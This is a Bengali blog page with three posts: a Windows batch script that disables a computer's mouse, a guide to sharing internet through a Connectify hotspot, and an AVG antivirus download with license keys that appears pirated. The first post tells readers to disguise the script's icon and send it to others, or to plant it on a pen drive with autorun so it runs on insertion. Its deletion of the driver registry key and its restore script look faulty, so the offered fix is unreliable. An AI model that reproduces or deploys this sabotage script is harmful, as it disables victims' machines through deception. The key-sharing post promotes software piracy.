আসসালামু আলাইকুম

শুক্রবার, ২ মার্চ, ২০১২

কম্পিউটার এর মাউস অচল করে দিন কোডিং দিয়ে (সাথে সমাধান)

কি খবর? সেদিন দিয়েছিলাম কিভাবে যে কোন কম্পিউটার এর কীবোর্ড অচল করে দিতে পারেন আজকে দেখাবো কিভাবে যে কোন কম্পিউটার এর মাউস সম্পূর্ণ অচল করে দিতে পারবেন। আজকের ট্রিকস টিও কিন্তু মারাত্মক খারাপ জিনিস। ভুলেও নিজের পিসিতে করবেন না সাইবার ক্যাফ এ গিয়ে প্র্যাকটিস করুন :p যাই হক আজকে দেখবো কিভাবে যে কোন পিসির মাউস অচল করে দিতে পারবেন পেন ড্রাইভ ঢুকিয়ে অথবা পেন ড্রাইভ ছারাও হবে। পেন ড্রাইভ টি যখন কোন পিসিতে ধুকাবেন তখন আর মাউস ই কাজ করবে না পেন ড্রাইভ খুলে নিলেই আবার ঠিক হবে। অথবা কৌশলে কোডিং ফাইল টি যে কাউকে সেন্ড করুন এখানে ক্লিক করলেই মাউস অচল হয়ে যাবে তবে এটা ঠিক করা ঝামেলা বেশী।

শুরু করলামঃ

১। নিচের কোড গুলো নোটপ্যাড এ পেস্ট করে সেভ এস দিয়ে সেভ করুন pp.bat নামে

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
এখন এই ফাইলটির ইমেজ চেঞ্জ করে কাউকে সেন্ড করুন। এটা ক্লিক করলেই মাউস অচল হয়ে যাবে। (আর যদি পেন ড্রাইভ এর মাঝে করতে চান স্টেপ ২ দেখুন তবে এই ফাইল টাও লাগবে)

২। এবার নিচের কোড গুলো নোটপ্যাড এ পেস্ট করে সেভ এস দিয়ে সেভ করুন autorun.inf নামে

[autorun]
Open=pp.bat
Action=Mouse Disable
৩। pp.bat নাম না দিয়ে যদি অন্য কিছু দেন তাহলে কিন্তু কাজ করবে না। অন্য নাম দিতে চাইলে ২ নং কোডিং এর ২ নং লাইনের pp.bat নাম বাদ দিয়ে নিজের নাম দিন এবং ১নং কোডিং ও একি নামে সেভ করা থাকতে হবে।

সমাধান দেখুন

১। হয়ত আপনি যাকে এটাক করতে চাচ্ছেন সেই আপনার আগে এই পোস্ট টি পড়েছে এবং এর মাঝেই আপনাকে এটাক করে ফেলেছে তাহলে নিচের কোড গুলো নোটপ্যাড এ পেস্ট করে সেভ এস দিয়ে সেভ করুন bcapp.bat নামে।

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1
২। এবার এটি ক্লিক করলেই মাউস সচল হয়ে যাবে আবার।

আপনার পিসি থেকে শেয়ার করুন ইন্টারনেট, ওয়ারলেস নেটওয়ার্ক এর মাধ্যমে এবং আপনার মোবাইল বা ল্যাপটপ এ ইন্টারনেট চালান ফ্রীতে

আজকে আমি আপনাদেরকে পিসি থেকে ইন্টারনেট শেয়ার করা শিখাবো,

প্রথমে দেখে নিন কি কি লাগবে……

ইন্টারনেট
একটি USB WLAN Router ডিভাইস ( এটা আপনি বাজারে কিনতে পারবেন, দাম মাত্র ২০০ কি ২৫০ টাকা ) / অথবা, আপনার ল্যাপটপ।
Connectify নামের একটি সফটওয়্যার ( ডাউনলোড করুন এখান থেকে)
এবার USB WLAN ডিভাইস টি আপনার কম্পিউটার এ লাগান, সফটওয়্যার টি ইন্সটল করুন (যে সফটওয়্যার টি আপনাদের দিয়েছি) । পিসি রিস্টার্ট চাইবে, রিস্টার্ট দিন। রিস্টার্ট হওয়ার পর দেখবেন যে CONNECTIFY নামের সফটওয়্যার টি ওপেন হয়েছে, নিচের ছবির মত

লক্ষ্য করুন আপনার হটস্পট টি অফ লাইন আছে, এবার আমরা Connectify সফটওয়্যার এর সেটিং এ যা যা করা দরকার তা করব।

১। Hostpot Name: ( যে নামে ইন্টারনেট শেয়ার করতে চাইছেন সে নাম দিন)

২। Password : (এখানে আপনি আপনার ইচ্ছা মত Password দিন)

৩। Internet : (এখানে আপনি যে ইন্টারনেট টি শেয়ার করবেন তা সিলেক্ট করুন মানে আপনি যে ইন্টারনেট চালান এখানে সেটা দেখাবে এবং তা সিলেক্ট করে দিন, যেমন আমি Broadband চালাই তাই Broadband সিলেক্ট করেছি )

৪। Advanced : (এখানে দেখুন Shar over & sharing mode রয়েছে, Share over আপনার WLAN ডিভাইসটি সিলেক্ট করুন ও sharing mode এ WI-Fi Access Point, Encrypted(WPA2) সিলেক্ট করে দেন।

৫। এবার Start Hotspot এ ক্লিক করুন একটু অপেক্ষা করুন তারপর দেখুন আপনার হটস্পট টি চালু হয়ে গেসে।

এবার আপনার মোবাইল বা ল্যাপটপ এ Wirless Lan সার্চ দেন দেখুন আপনার হটস্পট টি পেয়েছে আপনার নামে( Hostpot name এ যে নাম লিখেছিলেন সে নামে পাবে) আপনার মোবাইল বা ল্যাপটপ এ ওয়াইফাই টি চালু করতে হলে দেখবেন password চাইতেছে আপনার password টি দেন (মানে আপনি Connectify এর password এ যে password দিয়ে ছিলেন সেটি দিন)।

এবার মনের আনন্দে আপনার মোবাইল বা ল্যাপটপ এ ফ্রী নেট চালান।

আশা করি সবাই বুঝতে পারছেন যদি সমস্যা হয় বা ভাল লেগে তাকে তাহলে অবশ্যই কমেন্ট দিয়ে জানাবেন, আমি এখানে নতুন লিখতেছি তাই আমার লেখায় অনেক ভুল হতে পারে নিজের ছোটভাই হিসেবে মাপ করে দিবেন।
সবাই কে অনেক ধন্যবাদ…

ডাউনলোড AVG Internet Security 2012 with License Keys till 2018


আজ আমি আপনাদের সাথে শেয়ার করবো AVG Internet Security 2012 । আমার মনে হয় AVG নিয়ে নতুন করে বলার কিছু নেই । যারা উইনডোজ ৭ ব্যবহার করেন তাদের জন্য সবচেয়ে পারফেক্ট এন্টিভাইরাস । আমি নিজেও AVG Internet Security 2012 ব্যবহার করছি । আর যারা XP ব্যবহার করেন তারাও এটা ব্যবহার করতে পারেন । তো আর কথা না বাড়ায় । নিচের লিংক থেকে ডাউনলোড করে নিন । যাদের শুধু Serial Key লাগবে তাদের সুবিধার জন্য Serial Key –এর জন্য আলাদা লিংক দিলাম ।

ডাউনলোড লিংক ( সফটওয়্যার)
সিরিয়াল কী লিংক

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More